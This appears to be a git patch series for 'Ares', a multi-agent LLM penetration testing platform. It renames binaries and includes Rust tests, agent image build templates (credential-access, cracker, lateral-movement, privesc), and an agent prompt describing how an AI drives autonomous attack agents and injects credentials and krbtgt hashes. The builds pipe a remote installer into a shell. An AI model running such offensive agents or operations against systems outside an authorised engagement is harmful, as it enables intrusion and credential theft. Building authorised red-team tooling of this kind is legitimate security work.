%request.call_id, + "Failed to serialize tool result: {e}" + ); + } + } +} + +/// LPUSH result and set TTL. +async fn push_result( + conn: &mut redis::aio::ConnectionManager, + result_key: &str, + result_json: &str, +) -> anyhow::Result<()> { + conn.lpush::<_, _, ()>(result_key, result_json).await?; + conn.expire::<_, ()>(result_key, RESULT_TTL).await?; + Ok(()) +} + +// ─── Tests ────────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn tool_exec_request_deserialize() { + let json = r#"{ + "call_id": "nmap_scan_abc123", + "task_id": "recon_def456", + "tool_name": "nmap_scan", + "arguments": {"target": "192.168.58.0/24"} + }"#; + let req: ToolExecRequest = serde_json::from_str(json).unwrap(); + assert_eq!(req.call_id, "nmap_scan_abc123"); + assert_eq!(req.tool_name, "nmap_scan"); + assert_eq!(req.task_id, "recon_def456"); + } + + #[test] + fn tool_exec_response_serialize() { + let resp = ToolExecResponse { + call_id: "nmap_scan_abc123".into(), + output: "Found 5 hosts".into(), + error: None, + discoveries: None, + }; + let json = serde_json::to_string(&resp).unwrap(); + assert!(json.contains("nmap_scan_abc123")); + assert!(json.contains("Found 5 hosts")); + // discoveries omitted when None + assert!(!json.contains("discoveries")); + } + + #[test] + fn tool_exec_response_with_error() { + let resp = ToolExecResponse { + call_id: "x".into(), + output: String::new(), + error: Some("Connection refused".into()), + discoveries: None, + }; + let json = serde_json::to_string(&resp).unwrap(); + let parsed: serde_json::Value = serde_json::from_str(&json).unwrap(); + assert_eq!(parsed["error"], "Connection refused"); + } + + #[test] + fn tool_exec_response_with_discoveries() { + let resp = ToolExecResponse { + call_id: "nmap_abc".into(), + output: "scan output".into(), + error: None, + discoveries: Some(serde_json::json!({ + "hosts": [{"ip": "192.168.58.10", "services": ["445/tcp"]}] + })), + }; + let json = serde_json::to_string(&resp).unwrap(); + assert!(json.contains("discoveries")); + assert!(json.contains("192.168.58.10")); + } + + #[test] + fn redis_key_prefixes_match_orchestrator() { + // These must match tool_dispatcher.rs in ares-orchestrator + assert_eq!(TOOL_EXEC_PREFIX, "ares:tool_exec"); + assert_eq!(TOOL_RESULT_PREFIX, "ares:tool_results"); + } +} diff --git a/warpgate-templates/templates/ares-acl-agent/warpgate.yaml b/warpgate-templates/templates/ares-acl-agent/warpgate.yaml index 3e5c68c7..dfe92288 100644 --- a/warpgate-templates/templates/ares-acl-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-acl-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-agent/warpgate.yaml index 2679cb74..3f0166c4 100644 --- a/warpgate-templates/templates/ares-blue-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-agent/warpgate.yaml @@ -24,7 +24,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -47,8 +47,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml index 1b522225..90eea9c0 100644 --- a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml index 2537434a..1b4ba0b3 100644 --- a/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-threat-hunter-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml b/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml index e6f2daed..99bc7f9e 100644 --- a/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-blue-triage-agent/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -72,8 +72,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-cli/warpgate.yaml b/warpgate-templates/templates/ares-cli/warpgate.yaml index d7bd7955..c54a166f 100644 --- a/warpgate-templates/templates/ares-cli/warpgate.yaml +++ b/warpgate-templates/templates/ares-cli/warpgate.yaml @@ -23,7 +23,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-cli"] + - ENTRYPOINT ["ares"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -50,8 +50,8 @@ provisioners: - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-cli - - cp /tmp/ares-build/ares-rust/target/release/ares-cli /usr/local/bin/ares-cli + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml b/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml index 77f360db..83f0b3f9 100644 --- a/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-coercion-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml b/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml index c03facad..2523cae8 100644 --- a/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml +++ b/warpgate-templates/templates/ares-cracker-agent-gpu/warpgate.yaml @@ -61,8 +61,8 @@ provisioners: - curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - rm -rf /tmp/ares-build /root/.cargo /root/.rustup /usr/local/bin/x86_64-unknown-linux-gnu-gcc - rm -f /var/lib/apt/lists/lock /var/cache/apt/archives/lock /var/lib/dpkg/lock* - apt-get purge -y build-essential pkg-config libssl-dev || true diff --git a/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml b/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml index f3d75b9e..c225dc7b 100644 --- a/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-cracker-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml b/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml index 3bde9962..d7a0ecf5 100644 --- a/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-credential-access-agent/warpgate.yaml @@ -74,8 +74,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml b/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml index fbd9656f..c0aba4d5 100644 --- a/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-lateral-movement-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-orchestrator/warpgate.yaml b/warpgate-templates/templates/ares-orchestrator/warpgate.yaml index 46095b41..15d715aa 100644 --- a/warpgate-templates/templates/ares-orchestrator/warpgate.yaml +++ b/warpgate-templates/templates/ares-orchestrator/warpgate.yaml @@ -25,7 +25,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-orchestrator"] + - ENTRYPOINT ["ares", "orchestrator"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -54,8 +54,8 @@ provisioners: - export PATH="/root/.cargo/bin:$PATH" - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-orchestrator - - cp /tmp/ares-build/ares-rust/target/release/ares-orchestrator /usr/local/bin/ares-orchestrator + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml b/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml index 84744f66..41d0d2b5 100644 --- a/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-privesc-agent/warpgate.yaml @@ -75,8 +75,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-recon-agent/warpgate.yaml b/warpgate-templates/templates/ares-recon-agent/warpgate.yaml index 3ea8ac89..84efe257 100644 --- a/warpgate-templates/templates/ares-recon-agent/warpgate.yaml +++ b/warpgate-templates/templates/ares-recon-agent/warpgate.yaml @@ -73,8 +73,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. -f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 diff --git a/warpgate-templates/templates/ares-worker/warpgate.yaml b/warpgate-templates/templates/ares-worker/warpgate.yaml index 43631fc7..7828f324 100644 --- a/warpgate-templates/templates/ares-worker/warpgate.yaml +++ b/warpgate-templates/templates/ares-worker/warpgate.yaml @@ -24,7 +24,7 @@ base: DEBIAN_FRONTEND: noninteractive TZ: UTC changes: - - ENTRYPOINT ["ares-worker"] + - ENTRYPOINT ["ares", "worker"] - ENV DEBIAN_FRONTEND=noninteractive - ENV TZ=UTC sources: @@ -47,8 +47,8 @@ provisioners: - apt-get update && apt-get install -y --reinstall --no-install-recommends libc6-dev libssl-dev pkg-config libgcc-$(gcc -dumpversion | cut -d. 
-f1)-dev - ln -sf /usr/bin/gcc /usr/local/bin/x86_64-unknown-linux-gnu-gcc - ln -sf /usr/bin/gcc /usr/local/bin/aarch64-unknown-linux-gnu-gcc - - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares-worker - - cp /tmp/ares-build/ares-rust/target/release/ares-worker /usr/local/bin/ares-worker + - cd /tmp/ares-build/ares-rust && cargo build --release --bin ares + - cp /tmp/ares-build/ares-rust/target/release/ares /usr/local/bin/ares - type: shell only: - docker.arm64 From 187ca7c811399eecde7780e440b1e12082c33e3a Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 08:57:55 -0600 Subject: [PATCH 02/10] fix: update ares binary references and adjust telemetry init for service commands Changed: - Updated documentation, default values, and task output to use ares worker instead of ares-worker for consistency with the new binary naming in Ansible Redis role and related docs - Modified ares-cli to skip global telemetry initialization when running the orchestrator or worker subcommands, ensuring correct telemetry setup for service commands and preventing duplicate initialization --- .taskfiles/red/Taskfile.yaml | 2 +- ansible/roles/redis/README.md | 2 +- ansible/roles/redis/defaults/main.yml | 2 +- ares-cli/src/main.rs | 18 +++++++++++++----- 4 files changed, 16 insertions(+), 8 deletions(-) diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 2f95e820..5725c694 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -796,7 +796,7 @@ tasks: echo "Monitor with:" echo " task ec2:logs EC2_NAME={{.EC2_NAME}} ROLE=orchestrator" echo " task ec2:redis:forward EC2_NAME={{.EC2_NAME}} # then:" - echo " ARES_REDIS_URL=redis://localhost:16379 ares-cli ops loot --latest" + echo " ARES_REDIS_URL=redis://localhost:16379 ares ops loot --latest" silent: false ignore_error: true diff --git a/ansible/roles/redis/README.md b/ansible/roles/redis/README.md index 4cc70d51..72e36f61 100644 --- a/ansible/roles/redis/README.md +++ b/ansible/roles/redis/README.md @@ -21,7 +21,7 @@ Redis server for Ares worker message broker | `redis_maxmemory` | str | 256mb | No description | | `redis_maxmemory_policy` | str | allkeys-lru | No description | | `redis_install_ares_worker_unit` | bool | True | No description | -| `redis_ares_worker_binary` | str | /usr/local/bin/ares-worker | No description | +| `redis_ares_worker_binary` | str | /usr/local/bin/ares worker | No description | | `redis_ares_log_dir` | str | /var/log/ares | No description | | `redis_ares_config_dir` | str | /etc/ares | No description | | `redis_verify_install` | bool | False | No description | diff --git a/ansible/roles/redis/defaults/main.yml b/ansible/roles/redis/defaults/main.yml index fe7f6a00..1280c507 100644 --- a/ansible/roles/redis/defaults/main.yml +++ b/ansible/roles/redis/defaults/main.yml @@ -7,7 +7,7 @@ redis_maxmemory_policy: "allkeys-lru" # Ares worker configuration redis_install_ares_worker_unit: true -redis_ares_worker_binary: "/usr/local/bin/ares-worker" +redis_ares_worker_binary: "/usr/local/bin/ares worker" redis_ares_log_dir: "/var/log/ares" redis_ares_config_dir: "/etc/ares" diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index a59305a1..c037b2fa 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -57,11 +57,19 @@ async fn main() { } // ── Initialize telemetry before using tracing macros ── - // This must happen before any tracing calls below. 
- let _telemetry = ares_core::telemetry::init_telemetry( - ares_core::telemetry::TelemetryConfig::new("ares-cli") - .with_default_filter("warn,ares_cli=info"), - ); + // Skip for orchestrator/worker subcommands — they init their own telemetry + // with the correct service name. + let is_service_subcommand = std::env::args() + .nth(1) + .is_some_and(|a| a == "orchestrator" || a == "worker"); + let _telemetry = if !is_service_subcommand { + Some(ares_core::telemetry::init_telemetry( + ares_core::telemetry::TelemetryConfig::new("ares-cli") + .with_default_filter("warn,ares_cli=info"), + )) + } else { + None + }; if let Some(ref source) = secrets_from { match source.as_str() { From 5c6a9db0a1d1d0f48badcd73e95757ef6de36309 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 09:13:30 -0600 Subject: [PATCH 03/10] refactor: update all references to ares-cli to unified ares binary **Changed:** - Replaced all documentation and code references from `ares-cli` to `ares` to reflect migration to a single unified binary. Updated CLI usage examples, architecture diagrams, and deployment instructions in `.gemini/agents/ares-operator.md`, `AGENTS.md`, `README.md`, `docs/blue.md`, `docs/red.md`, and related docs. - Updated project structure and crate descriptions in `.github/CONTRIBUTING.md` to describe the unified binary model (CLI, orchestrator, and worker). - Adjusted Taskfiles and build output messages in `.taskfiles/blue/Taskfile.yaml`, `.taskfiles/red/Taskfile.yaml`, `.taskfiles/remote/Taskfile.yaml`, and `Taskfile.yaml` to use the `ares` binary instead of `ares-cli`. - Revised all code comments, help output, and user-facing messages in `ares-cli/src/blue/submit.rs`, `ares-cli/src/ops/backfill.rs`, `ares-cli/src/orchestrator/blue/auto_submit.rs`, `ares-cli/src/orchestrator/blue/investigation.rs`, `ares-cli/src/orchestrator/mod.rs`, and `ares-core/src/lib.rs` to reference `ares` instead of `ares-cli`. - Updated documentation paths and references to code locations in `docs/blue.md` and `docs/red.md` to match the new unified crate structure (e.g., orchestrator and worker code now under `ares-cli`). - Modified infrastructure and deployment docs (`docs/infrastructure.md`) and Docker Compose templates to invoke the correct binary and entrypoints. - Clarified crate layout and tool build script references in `tools.yaml` to reflect the unified build process. --- .gemini/agents/ares-operator.md | 88 +++++++++---------- .github/CONTRIBUTING.md | 6 +- .taskfiles/blue/Taskfile.yaml | 6 +- .taskfiles/red/Taskfile.yaml | 6 +- .taskfiles/remote/Taskfile.yaml | 2 +- AGENTS.md | 84 +++++++++--------- README.md | 76 ++++++++-------- Taskfile.yaml | 4 +- ares-cli/src/blue/submit.rs | 2 +- ares-cli/src/ops/backfill.rs | 2 +- ares-cli/src/orchestrator/blue/auto_submit.rs | 2 +- .../src/orchestrator/blue/investigation.rs | 2 +- ares-cli/src/orchestrator/mod.rs | 2 +- ares-core/src/lib.rs | 2 +- docs/blue.md | 50 +++++------ docs/grafana_mcp_usage.md | 2 +- docs/infrastructure.md | 26 +++--- docs/red.md | 18 ++-- tools.yaml | 2 +- 19 files changed, 191 insertions(+), 191 deletions(-) diff --git a/.gemini/agents/ares-operator.md b/.gemini/agents/ares-operator.md index 87c0239c..51bf6763 100644 --- a/.gemini/agents/ares-operator.md +++ b/.gemini/agents/ares-operator.md @@ -12,14 +12,14 @@ model: gemini-1.5-pro max_turns: 40 --- -You operate a distributed multi-agent penetration testing system called Ares. 
The system runs on remote infrastructure (K8s cluster or EC2 instance) — you drive it from the local machine via `ares-cli` or Taskfile commands. +You operate a distributed multi-agent penetration testing system called Ares. The system runs on remote infrastructure (K8s cluster or EC2 instance) — you drive it from the local machine via `ares` or Taskfile commands. ## Architecture ``` Local (this machine) Remote (K8s or EC2) ──────────────────── ─────────────────── -ares-cli --k8s / --ec2 → ares-orchestrator (LLM coordination loop) +ares --k8s / --ec2 → ares-orchestrator (LLM coordination loop) or `task` commands ares-worker x7 (recon, credential_access, cracker, acl, privesc, lateral, coercion) Redis (state store + message broker) @@ -29,9 +29,9 @@ The orchestrator and workers are autonomous LLM agents. You don't control them d ## Two Deployment Targets -**K8s** (primary): Use `ares-cli --k8s ` or `task red:multi:*` commands. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). +**K8s** (primary): Use `ares --k8s ` or `task red:multi:*` commands. Auto-detects deployment name (`ares-orchestrator` for red, `ares-blue-orchestrator` for blue). -**EC2** (alternative): Use `ares-cli --ec2 ` or `task ec2:*` commands. Resolves instance by Name tag, executes via AWS SSM. +**EC2** (alternative): Use `ares --ec2 ` or `task ec2:*` commands. Resolves instance by Name tag, executes via AWS SSM. ### Global CLI Flags @@ -78,8 +78,8 @@ IMPORTANT: After code changes, ALWAYS deploy before testing. Use `task remote:ch # via Taskfile (convenience wrappers) task red:multi TARGET=dreadgoad DOMAIN=sevenkingdoms.local -# via ares-cli (direct) -ares-cli ops submit dreadgoad contoso.local \ +# via ares (direct) +ares ops submit dreadgoad contoso.local \ --username administrator --password P@ssw0rd \ --model gpt-5.2 --max-steps 200 --follow @@ -91,11 +91,11 @@ task ec2:launch DOMAIN=sevenkingdoms.local TARGETS=192.168.58.10 ```bash # Direct CLI with transport (preferred) -ares-cli --k8s ares-red ops status --latest -ares-cli --k8s ares-red ops loot --latest --watch 10 --diff -ares-cli --k8s ares-red ops tasks --latest --status failed -ares-cli --k8s ares-red ops queue # Check Redis queue state -ares-cli --k8s ares-red ops list +ares --k8s ares-red ops status --latest +ares --k8s ares-red ops loot --latest --watch 10 --diff +ares --k8s ares-red ops tasks --latest --status failed +ares --k8s ares-red ops queue # Check Redis queue state +ares --k8s ares-red ops list # Taskfile wrappers task red:multi:status LATEST=true @@ -109,34 +109,34 @@ When natural progression stalls, inject state to skip past blockers: ```bash # Inject a known credential -ares-cli --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local +ares --k8s ares-red ops inject-credential op-xxx administrator P@ssw0rd --domain contoso.local # Inject an NTLM hash -ares-cli --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." +ares --k8s ares-red ops inject-hash op-xxx krbtgt "hash..." --domain contoso.local --aes-key "..." # Inject a foreign domain host or domain SID -ares-cli --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local -ares-cli --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." +ares --k8s ares-red ops inject-host op-xxx 192.168.58.20 dc01.fabrikam.local +ares --k8s ares-red ops inject-domain-sid op-xxx --domain fabrikam.local --sid "S-1-5-..." 
# Inject a vulnerability (e.g., delegation, esc1) -ares-cli --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ +ares --k8s ares-red ops inject-vulnerability op-xxx constrained_delegation 192.168.58.20 \ --account-name svc_sql --domain fabrikam.local ``` ### Reports & Playbooks ```bash -ares-cli --k8s ares-red ops report --latest --regenerate -ares-cli --k8s ares-red ops export-detection --latest # Export markdown/JSON detection playbook -ares-cli --k8s ares-red ops offload-cost --latest # Sync token costs to Postgres +ares --k8s ares-red ops report --latest --regenerate +ares --k8s ares-red ops export-detection --latest # Export markdown/JSON detection playbook +ares --k8s ares-red ops offload-cost --latest # Sync token costs to Postgres ``` ### Maintenance ```bash -ares-cli --k8s ares-red ops backfill-domains op-xxx # Re-scan state to populate domain list -ares-cli --k8s ares-red ops kill --all # Kill all running ops -ares-cli --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoints +ares --k8s ares-red ops backfill-domains op-xxx # Re-scan state to populate domain list +ares --k8s ares-red ops kill --all # Kill all running ops +ares --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoints ``` ## Blue Team Operations @@ -145,26 +145,26 @@ ares-cli --k8s ares-red ops cleanup --max-age-hours 24 # Delete old checkpoin ```bash # From red team operation -ares-cli --k8s ares-blue blue from-operation --latest +ares --k8s ares-blue blue from-operation --latest # Single alert JSON -ares-cli --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 +ares --k8s ares-blue blue submit '{"alert_title":"LSASS Read"}' --model gpt-5.2 # Continuous poll mode -ares-cli --k8s ares-blue blue watch --poll-interval 30 +ares --k8s ares-blue blue watch --poll-interval 30 ``` ### Monitor & Reports ```bash -ares-cli --k8s ares-blue blue status --latest -ares-cli --k8s ares-blue blue evidence --latest --json -ares-cli --k8s ares-blue blue triage-status --latest -ares-cli --k8s ares-blue blue operation-status --latest --watch 5 +ares --k8s ares-blue blue status --latest +ares --k8s ares-blue blue 